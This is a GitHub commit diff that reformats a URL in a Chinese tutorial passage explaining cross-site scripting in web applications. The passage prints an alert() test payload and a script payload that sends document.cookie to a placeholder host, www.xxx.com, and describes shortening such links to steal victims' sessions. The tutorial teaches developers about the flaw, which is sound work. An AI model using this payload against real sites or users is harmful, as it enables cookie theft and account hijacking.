fix url markdown

This commit is contained in:
isLishude
2018-01-09 21:32:48 +08:00
committed by GitHub
parent 73307a94c6
commit cf2d86b448

View File

@@ -21,7 +21,7 @@ Web应用未对用户提交请求的数据做充分的检查过滤允许用
hello astaxie
如果我们传递这样的url`http://127.0.0.1/?name=<script>alert('astaxie,xss')</script>`,这时你就会发现浏览器跳出一个弹出框这说明站点已经存在了XSS漏洞。那么恶意用户是如何盗取Cookie的呢与上类似如下这样的url`http://127.0.0.1/?name=<script>document.location.href='http://www.xxx.com/cookie?'+document.cookie</script>`这样就可以把当前的cookie发送到指定的站点www.xxx.com。你也许会说这样的URL一看就有问题怎么会有人点击是的这类的URL会让人怀疑但如果使用短网址服务将之缩短你还看得出来么攻击者将缩短过后的url通过某些途径传播开来不明真相的用户一旦点击了这样的url相应cookie数据就会被发送事先设定好的站点这样子就盗得了用户的cookie信息然后就可以利用Websleuth之类的工具来检查是否能盗取那个用户的账户。
如果我们传递这样的url`http://127.0.0.1/?name=<script>alert('astaxie,xss')</script>`,这时你就会发现浏览器跳出一个弹出框这说明站点已经存在了XSS漏洞。那么恶意用户是如何盗取Cookie的呢与上类似如下这样的url`http://127.0.0.1/?name=<script>document.location.href='http://www.xxx.com/cookie?'+document.cookie</script>`这样就可以把当前的cookie发送到指定的站点`www.xxx.com`。你也许会说这样的URL一看就有问题怎么会有人点击是的这类的URL会让人怀疑但如果使用短网址服务将之缩短你还看得出来么攻击者将缩短过后的url通过某些途径传播开来不明真相的用户一旦点击了这样的url相应cookie数据就会被发送事先设定好的站点这样子就盗得了用户的cookie信息然后就可以利用Websleuth之类的工具来检查是否能盗取那个用户的账户。
更加详细的关于XSS的分析大家可以参考这篇叫做《[新浪微博XSS事件分析](http://www.rising.com.cn/newsletter/news/2011-08-18/9621.html)》的文章。